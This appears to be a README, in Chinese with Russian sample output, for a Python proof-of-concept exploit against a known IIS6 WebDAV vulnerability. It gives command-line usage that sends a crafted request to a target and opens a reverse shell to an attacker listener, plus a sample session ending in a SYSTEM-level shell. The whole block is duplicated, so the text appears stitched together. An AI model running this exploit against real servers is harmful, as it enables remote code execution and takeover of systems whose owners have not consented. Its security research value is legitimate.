GenWebDavIISExploit 是一个 PoC 工具,演示针对 IIS6 WebDAV 组件中一个已知漏洞的利用。该工具仅为教育和研究目的而设计,用于展示如何利用该漏洞在远程服务器上执行任意代码。
本项目仅供教育目的使用。请负责任地使用此工具,并且仅在您拥有或获得明确测试许可的系统上使用。未经授权访问计算机系统是非法的。
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...
[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> ipconfig
Настройка IP Windows
Адаптер Ethernet Local Area Connection:
DNS-суффикс подключения . . . . . : example.local
IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
Маска подсети . . . . . . . . . . : 255.255.255.0
Основной шлюз . . . . . . . . . . : 192.168.1.1
GenWebDavIISExploit 是一个 PoC 工具,演示针对 IIS6 上 WebDAV 组件中一个已知漏洞的利用。该工具为教育和研究目的而创建,用于展示该漏洞如何被利用以在远程服务器上执行任意代码。
本项目仅用于教育目的。请负责任地使用此工具,并且仅在您拥有或获得明确测试许可的系统上使用。未经授权访问计算机系统是非法的。
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...
[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> ipconfig
Настройка IP Windows
Адаптер Ethernet Local Area Connection:
DNS-суффикс подключения . . . . . : example.local
IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
Маска подсети . . . . . . . . . . : 255.255.255.0
Основной шлюз . . . . . . . . . . : 192.168.1.1